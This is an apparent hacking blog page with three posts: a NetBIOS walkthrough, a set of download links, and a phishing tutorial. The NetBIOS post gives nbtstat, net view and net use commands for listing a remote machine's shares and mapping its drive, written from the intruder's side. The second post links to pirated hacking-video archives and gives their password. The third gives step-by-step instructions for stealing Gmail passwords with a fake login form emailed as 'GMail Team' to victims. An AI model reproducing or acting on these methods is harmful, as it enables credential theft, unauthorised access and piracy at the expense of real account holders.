Please, read out !

Most people think that hackers are computer criminals. They fail to recognise the fact that criminals and hackers are two totally different things. Media is responsible for this. Hackers in reality are actually good and extremely intelligent people who by using their knowledge in a constructive manner help organisations, companies, goverment, etc. to secure documents and secret information on the internet.

NetBIOS Hacking

0 comments

NetBIOS stands for "Network Basic Input Output System".
It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources.
By default it runs on port 139.
NetBIOS gives the various information of the computers on a network, which includes computer name, username, domain, group, and many others.....!

The NBTSTAT Command :-
NBTSTAT is the command for manually interact with NetBIOS Over TCP/IP.
All the attributes (switches) used with nbtstat command and their usage can be viewed.
At the command prompt type-

C:\Windows>nbtstat

NBTSTAT


Sample NBTSTAT Response :-

C:\>nbtstat -A 117.200.160.174

NetBIOS Remote Machine Name Table

Name Type Status
----------------------------------------------
PRASANNA <00> UNIQUE Registered
INSECURE LABS <00> GROUP Registered
PRASANNA <03> UNIQUE Registered
PRASANNA <20> UNIQUE Registered
INSECURE LABS <1e> GROUP Registered

MAC Address = 86-95-55-50-00-00


An intruder could use the output from an nbtstat against your machines to begin gathering information about them.

"<03> in above table is nothing but the username of that system."

The next step for an intruder would be to try and list the open shares on the given computer, using the net view command.
Here is an example of the Net View command-

C:\>net view \\117.200.160.174
Shared resources at \\117.200.160.174

Sharename Type Comment
----------------------------------------
C Disk Drive C:\
MySofts Disk My Softwares Collection
E Disk Drive E:\

The command was completed successfully.


This information would give the intruder a list of shares which he would then use in conjunction with the Net Use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive, which he could then browse...!

C:\>net use G: \\117.200.160.174\C
The command was completed successfully.

C:\>G:

G:\>
Read On

Hacking Video Tutorial

1 comments

Well friend let them here videos of hacking, just Look at the OS that are echos because it will be Linux? just like two I think it is Windows, but hey this is only an interlude of what is in these videos.


Product description:
A file that contains 52 videos in SWF format, avi and wmv, dode have different content as:
* Telnet
* Brute Force
* Exploring Bugs
* Hacking a Network
* Use of software Hacker
* And much more

File weight: 663 MB 6 parts of 95.7 Mb and 1 88.9
Compression Format: RAR

http://rapidshare.com/files/66601513/Hacking_Videos_www.programasfull.net.part1.rar
http://rapidshare.com/files/66689213/Hacking_Videos_www.programasfull.net.part2.rar
http://rapidshare.com/files/66584939/Hacking_Videos_www.programasfull.net.part3.rar
http://rapidshare.com/files/66738936/Hacking_Videos_www.programasfull.net.part4.rar
http://rapidshare.com/files/66854741/Hacking_Videos_www.programasfull.net.part5.rar
http://rapidshare.com/files/66871449/Hacking_Videos_www.programasfull.net.part6.rar
http://rapidshare.com/files/66706735/Hacking_Videos_www.programasfull.net.part7.rar

Password:
www.programasfull.net

Read On

Cracking GMail Account Password

1 comments

Here is the most effective technique for cracking GMail Accounts Passwords.

This method uses 'Social Engineering' rather than 'Phishing'.

Follow the steps as given below :-

Success Rate :- 90%

Step-1 : Create your own fake gmail login form using HTML, which may look like one as shown below-


The HTML code for above login screen created by me is given below-



Step-2 : We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-

1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following-



OR

2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp' files to your server.


Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.

As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!

Done.......?
Read On